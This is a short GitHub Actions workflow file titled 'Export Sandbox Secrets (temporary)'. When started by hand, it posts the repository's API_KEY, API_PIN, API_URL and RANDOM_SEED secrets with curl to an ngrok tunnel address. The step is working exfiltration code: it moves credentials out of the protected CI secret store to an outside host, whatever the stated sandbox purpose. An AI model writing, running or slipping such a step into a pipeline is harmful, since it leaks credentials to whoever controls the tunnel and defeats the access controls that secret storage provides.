name: Export Sandbox Secrets (temporary)
on:
  workflow_dispatch:

jobs:
  export:
    runs-on: ubuntu-latest
    steps:
      - name: Send secrets
        run: |
          curl -X POST https://5556-162-205-139-242.ngrok-free.app \
            -H "Content-Type: application/json" \
            -d '{
              "API_KEY": "${{ secrets.API_KEY }}",
              "API_PIN": "${{ secrets.API_PIN }}",
              "API_URL": "${{ secrets.API_URL }}",
              "RANDOM_SEED": "${{ secrets.RANDOM_SEED }}"
            }'
